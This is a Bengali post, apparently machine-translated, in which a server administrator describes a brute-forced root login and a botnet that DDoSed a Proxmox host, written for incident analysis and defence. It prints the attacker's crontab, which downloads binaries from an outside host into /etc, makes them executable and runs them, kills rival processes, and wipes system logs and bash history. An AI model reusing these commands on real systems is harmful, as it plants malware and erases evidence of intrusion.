ঠিক আছে, যেমনটি প্রত্যাশিত এবং @ জোয়েল ডেভিস বলেছিলেন, সমস্ত লগ মুছে ফেলা হয়েছিল, তবে একটি ফাইল ছিল যা @ রমেশ উল্লেখ করেছিলেন যে রুট ব্যবহারকারীকে অ্যাক্সেস করার কিছু চেষ্টা রয়েছে তবে কয়েকবার সঠিক পাসওয়ার্ড প্রবেশ করতে ব্যর্থ হয়েছে, তারপরে সংযোগ বিচ্ছিন্ন অনেকগুলি পুনরায় চেষ্টা করে।
আমি তিনটি ঠিকানাতে একটি ট্রেস্রোলেট চালিয়েছিলাম এবং দুটি চীন থেকে এবং অন্যটি পাকিস্তানের; এগুলি আইপি:
221.120.224.179
116.10.191.218
61.174.51.221
সমঝোতার পরে সার্ভারের মধ্যে যে বোটনেট ইনজেকশন দেওয়া হয়েছিল সে সম্পর্কে আরও তথ্য:
হ্যাকাররা 7 এক্সিকিউটেবল কার্যকর করার জন্য ক্রোনট্যাব সম্পাদনা করে যা প্রতিটি x পরিমাণ সময়, সমস্ত সিপিইউ ব্যবহার করে, সর্বোচ্চ সার্ভারের নেটওয়ার্ক আউটপুট ব্যবহার করে, তবে কেবল মারা যায় die এছাড়াও তারা যুক্ত রেখাগুলি লুকানোর জন্য 100 বার ক্রোনট্যাবে রিডমি যুক্ত করে, তাই যখন আপনি করবেন তখন crontab -l
লুকানো রেখাগুলির সাহায্যে রেডমে স্প্যাম হবে। এটির প্রতিরোধ করার জন্য, আমি ব্যবহার করেছি crontab -l | grep -v '^#'
এবং এখানে এই আদেশটির আউটপুট রয়েছে:
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
আপনি দেখতে পাচ্ছেন, সমস্ত লগ ফাইল সাফ হয়ে গেছে, এই কারণেই আমি প্রচুর তথ্য উদ্ধার করতে সক্ষম হই নি।
এটি পুরো সার্ভারটি (সমস্ত ভিএম) নীচে এনেছে যা সাইটগুলিতে এবং প্রক্সমক্সে সময়সীমা তৈরি করে। এখানে একটি গ্রাফ রয়েছে (স্পাইকগুলি বোটনেটকে সক্রিয়ভাবে ডিডো'ইং বোঝায় এবং নেটওয়ার্কটি লক্ষ্য করে):
ফলস্বরূপ আমি সমস্ত সংযোগগুলি ব্লক করতে ফায়ারওয়ালে সম্পূর্ণ চীনা আইপি অ্যাড্রেস যুক্ত করব (আমার কোনও চীনা ব্যবহারকারী নেই যাতে আমার যত্ন নেই), আমি দূরবর্তী রুট লগইনগুলিও অস্বীকার করব এবং দীর্ঘ জটিল ব্যবহার করব পাসওয়ার্ড। আমি সম্ভবত ssh পোর্ট পরিবর্তন করতে এবং পাশাপাশি বেসরকারী ssh কী ব্যবহার করব।